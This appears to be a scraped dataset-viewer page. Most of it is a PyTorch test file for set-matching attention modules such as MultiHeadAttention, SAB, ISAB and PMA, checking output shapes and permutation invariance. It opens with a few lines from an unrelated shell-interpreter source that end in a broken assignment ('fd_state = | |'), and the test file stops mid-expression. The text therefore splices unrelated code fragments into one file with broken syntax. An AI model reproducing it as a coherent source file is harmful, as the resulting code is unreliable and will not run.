# the CommandEvaluator, so we could put them somewhere else.
cmd_deps.traps = {}
cmd_deps.trap_nodes = [] # TODO: Clear on fork() to avoid duplicates
job_state = process.JobState()
fd_state = | |
import torch
from set_matching.models.modules import (
ISAB,
MAB,
PMA,
SAB,
ConvolutionSentence,
CrossSetDecoder,
FeedForwardLayer,
LayerNormalizationSentence,
MultiHeadAttention,
MultiHeadExpectation,
MultiHeadSimilarity,
SetDecoder,
SetEncoder,
SetISABEncoder,
SlotAttention,
StackedCrossSetDecoder,
make_attn_mask,
)
def test_make_attn_mask():
"""
target
T F F F
---------
T| T F F F
source T| T F F F
F| F F F F
"""
mask_x = torch.tensor([[True, True, False]])
mask_y = torch.tensor([[True, False, False, False]])
mask_xx = torch.tensor([[True, True, False], [True, True, False], [False, False, False]])
mask_xy = torch.tensor([[True, False, False, False], [True, False, False, False], [False, False, False, False]])
assert torch.all(make_attn_mask(mask_x, mask_x) == mask_xx)
assert torch.all(make_attn_mask(mask_x, mask_y) == mask_xy)
def test_convolution_sentence():
in_channels, out_channels = 32, 64
m = ConvolutionSentence(in_channels, out_channels, bias=False)
torch.nn.init.ones_(m.weight)
m.eval()
batchsize, sentence_length = 2, 8
x = torch.rand(batchsize, in_channels, sentence_length)
y = m(x)
assert y.shape == (batchsize, out_channels, sentence_length)
assert torch.all(torch.isclose(y[0, 0, :], x[0, :, :].sum(0)))
def test_layer_normalization_sentence():
n_units = 64
m = LayerNormalizationSentence(n_units, eps=1e-6)
torch.nn.init.ones_(m.weight)
m.reset_parameters()
m.eval()
batchsize, sentence_length = 2, 8
x = torch.rand(batchsize, n_units, sentence_length)
y = m(x)
assert y.shape == (batchsize, n_units, sentence_length)
def test_feed_forward_layer():
n_units = 64
m = FeedForwardLayer(n_units)
torch.nn.init.ones_(m.w_1.weight)
torch.nn.init.zeros_(m.w_1.bias)
torch.nn.init.ones_(m.w_2.weight)
torch.nn.init.zeros_(m.w_2.bias)
m.eval()
batchsize, sentence_length = 2, 8
x = -torch.abs(torch.rand(batchsize, n_units, sentence_length))
y = m(x)
assert y.shape == (batchsize, n_units, sentence_length)
_x = torch.cat([x.sum(dim=1, keepdim=True)] * n_units * 4, dim=1)
_x = torch.where(_x < 0, 0.2 * _x, _x)
_y = torch.cat([_x.sum(dim=1, keepdim=True)] * n_units, dim=1)
assert torch.all(torch.isclose(y, _y, atol=1e-6))
n_out_units = 128
m = FeedForwardLayer(n_units, n_out_units)
torch.nn.init.ones_(m.w_1.weight)
torch.nn.init.zeros_(m.w_1.bias)
torch.nn.init.ones_(m.w_2.weight)
torch.nn.init.zeros_(m.w_2.bias)
m.eval()
batchsize, sentence_length = 2, 8
x = -torch.abs(torch.rand(batchsize, n_units, sentence_length))
y = m(x)
assert y.shape == (batchsize, n_out_units, sentence_length)
_x = torch.cat([x.sum(dim=1, keepdim=True)] * n_units * 4, dim=1)
_x = torch.where(_x < 0, 0.2 * _x, _x)
_y = torch.cat([_x.sum(dim=1, keepdim=True)] * n_out_units, dim=1)
assert torch.all(torch.isclose(y, _y, atol=1e-6))
def test_multiead_softmax_self_attention():
n_units = 128
m = MultiHeadAttention(n_units, n_heads=8, self_attention=True, activation_fn="softmax")
m.eval()
batchsize, sentence_length = 2, 8
x = torch.rand(batchsize, n_units, sentence_length)
mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
xx_mask = make_attn_mask(mask, mask)
y = m(x, mask=xx_mask)
assert y.shape == (batchsize, n_units, sentence_length)
assert torch.all(y[0, :, -3:] == torch.zeros((n_units, 3), dtype=torch.float32))
assert torch.all(y[1, :, -4:] == torch.zeros((n_units, 4), dtype=torch.float32))
# permutation equivariant
x_perm = x[:, :, [1, 2, 3, 0, 4, 5, 6, 7]]
y_perm = m(x_perm, mask=xx_mask)
assert torch.all(torch.isclose(y[:, :, [1, 2, 3, 0, 4, 5, 6, 7]], y_perm, atol=1e-6))
def test_multiead_softmax_attention():
n_units = 128
m = MultiHeadAttention(
n_units, n_heads=8, self_attention=False, activation_fn="softmax", normalize_attn=True, finishing_linear=False
)
m.eval()
batchsize, sentence_length, query_length = 2, 8, 4
x = torch.rand(batchsize, n_units, sentence_length)
y = torch.rand(batchsize, n_units, query_length)
x_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
y_mask = torch.tensor([[True] * 3 + [False] * 1, [True] * 2 + [False] * 2])
yx_mask = make_attn_mask(y_mask, x_mask)
z = m(y, x, mask=yx_mask)
assert z.shape == (batchsize, n_units, query_length)
assert torch.all(z[0, :, -1:] == torch.zeros((n_units, 1), dtype=torch.float32))
assert torch.all(z[1, :, -2:] == torch.zeros((n_units, 2), dtype=torch.float32))
# permutation invariant
x_perm = x[:, :, [1, 2, 3, 0, 4, 5, 6, 7]]
z_perm = m(y, x_perm, mask=yx_mask)
assert torch.all(torch.isclose(z[0, :, :3], z_perm[0, :, :3], atol=1e-6))
assert torch.all(torch.isclose(z[1, :, :2], z_perm[1, :, :2], atol=1e-6))
# permutation equivariant
y_perm = y[:, :, [1, 0, 2, 3]]
z_perm = m(y_perm, x, mask=yx_mask)
assert torch.all(torch.isclose(z[0, :, [1, 0, 2]], z_perm[0, :, :3], atol=1e-6))
assert torch.all(torch.isclose(z[1, :, [1, 0]], z_perm[1, :, :2], atol=1e-6))
def test_multiead_relu_attention():
n_units = 128
m = MultiHeadAttention(n_units, n_heads=8, self_attention=True, activation_fn="relu")
m.eval()
batchsize, sentence_length = 2, 8
x = torch.rand(batchsize, n_units, sentence_length)
mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
xx_mask = make_attn_mask(mask, mask)
y = m(x, mask=xx_mask)
assert y.shape == (batchsize, n_units, sentence_length)
assert torch.all(y[0, :, -3:] == torch.zeros((n_units, 3), dtype=torch.float32))
assert torch.all(y[1, :, -4:] == torch.zeros((n_units, 4), dtype=torch.float32))
# permutation equivariant
x_perm = x[:, :, [1, 2, 3, 0, 4, 5, 6, 7]]
y_perm = m(x_perm, mask=xx_mask)
assert torch.all(torch.isclose(y[:, :, [1, 2, 3, 0, 4, 5, 6, 7]], y_perm, atol=1e-6))
def test_multihead_similarity():
n_units, n_heads = 128, 8
m = MultiHeadSimilarity(n_units, n_heads)
m.eval()
batchsize, sentence_length = 2, 8
x = torch.rand(batchsize, n_units, sentence_length)
y = torch.rand(batchsize, n_units, sentence_length + 1)
x_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
y_mask = torch.tensor([[True] * 4 + [False] * 5, [True] * 5 + [False] * 4])
xy_mask = make_attn_mask(x_mask, y_mask)
yx_mask = make_attn_mask(y_mask, x_mask)
# x_y = m(x * torch.cat([x_mask[None, :, :]] * n_units, dim=0).permute(1, 0, 2), y, xy_mask=xy_mask)
x_y = m(x, y, xy_mask)
assert x_y.shape == (batchsize, n_units, sentence_length)
y_x = m(y, x, yx_mask)
assert y_x.shape == (batchsize, n_units, sentence_length + 1)
# permutation equivariant
x_perm = x[:, :, [1, 2, 3, 0, 4, 5, 6, 7]]
x_perm_y = m(x_perm, y, xy_mask)
assert torch.all(torch.isclose(x_y[:, :, [1, 2, 3, 0, 4, 5, 6, 7]], x_perm_y, atol=1e-6))
# permutation invariant
y_perm = y[:, :, [1, 0, 2, 3, 4, 5, 6, 7, 8]]
x_y_perm = m(x, y_perm, xy_mask)
assert torch.all(torch.isclose(x_y, x_y_perm, atol=1e-6))
attn = m.get_attnmap(x, y, xy_mask)
assert attn.shape == (batchsize * n_heads, sentence_length, sentence_length + 1)
def test_multihead_expectation():
n_units, n_heads = 128, 8
m = MultiHeadExpectation(n_units, n_heads)
m.eval()
batchsize, sentence_length = 2, 8
x = torch.rand(batchsize, n_units, sentence_length)
y = torch.rand(batchsize, n_units, sentence_length + 1)
x_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
y_mask = torch.tensor([[True] * 4 + [False] * 5, [True] * 5 + [False] * 4])
xy_mask = make_attn_mask(x_mask, y_mask)
yx_mask = make_attn_mask(y_mask, x_mask)
x_y = m(x, y, xy_mask)
assert x_y.shape == (batchsize, 1)
y_x = m(y, x, yx_mask)
assert y_x.shape == (batchsize, 1)
# permutation invariant
x_perm = x[:, :, [1, 2, 3, 0, 4, 5, 6, 7]]
x_perm_y = m(x_perm, y, xy_mask)
assert torch.all(torch.isclose(x_y, x_perm_y, atol=1e-6))
# permutation invariant
y_perm = y[:, :, [1, 0, 2, 3, 4, 5, 6, 7, 8]]
x_y_perm = m(x, y_perm, xy_mask)
assert torch.all(torch.isclose(x_y, x_y_perm, atol=1e-6))
def test_sab():
n_units = 128
m = SAB(n_units, n_heads=8)
m.eval()
batchsize, sentence_length = 2, 8
x = torch.rand(batchsize, n_units, sentence_length)
mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
xx_mask = make_attn_mask(mask, mask)
y = m(x, xx_mask)
assert y.shape == (batchsize, n_units, sentence_length)
# permutation equivariant
x_perm = x[:, :, [1, 2, 3, 0, 4, 5, 6, 7]]
y_perm = m(x_perm, xx_mask)
assert torch.all(torch.isclose(y[:, :, [1, 2, 3, 0, 4, 5, 6, 7]], y_perm, atol=1e-6))
def test_isab():
n_units, dim_i = 128, 16
m = ISAB(n_units, n_heads=8, m=dim_i)
m.eval()
batchsize, sentence_length = 2, 8
x = torch.rand(batchsize, n_units, sentence_length)
x_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
i_mask = torch.tensor([[True] * dim_i] * 2)
xi_mask = make_attn_mask(x_mask, i_mask)
ix_mask = make_attn_mask(i_mask, x_mask)
y = m(x, ix_mask, xi_mask)
assert y.shape == (batchsize, n_units, sentence_length)
# permutation equivariant
x_perm = x[:, :, [1, 2, 3, 0, 4, 5, 6, 7]]
y_perm = m(x_perm, ix_mask, xi_mask)
assert torch.all(torch.isclose(y[:, :, [1, 2, 3, 0, 4, 5, 6, 7]], y_perm, atol=1e-6))
def test_mab():
n_units = 128
m = MAB(n_units, n_heads=8)
m.eval()
batchsize, sentence_length = 2, 8
x = torch.rand(batchsize, n_units, sentence_length)
z = torch.rand(batchsize, n_units, sentence_length + 1)
x_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * 4 + [False] * 4])
z_mask = torch.tensor([[True] * 5 + [False] * 4, [True] * 4 + [False] * 5])
xz_mask = make_attn_mask(x_mask, z_mask)
y = m(x, z, xz_mask)
assert y.shape == (batchsize, n_units, sentence_length)
# permutation equivariant
x_perm = x[:, :, [1, 2, 3, 0, 4, 5, 6, 7]]
y_perm = m(x_perm, z, xz_mask)
assert torch.all(torch.isclose(y[:, :, [1, 2, 3, 0, 4, 5, 6, 7]], y_perm, atol=1e-6))
def test_pma():
n_units, n_output_instances = 128, 2
m = PMA(n_units, n_heads=8, n_output_instances=n_output_instances)
m.eval()
batchsize, sentence_length = 2, 8
x = torch.rand(batchsize, n_units, sentence_length)
x_mask = torch.tensor([[True] * 5 + [False] * 3, [True] * |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.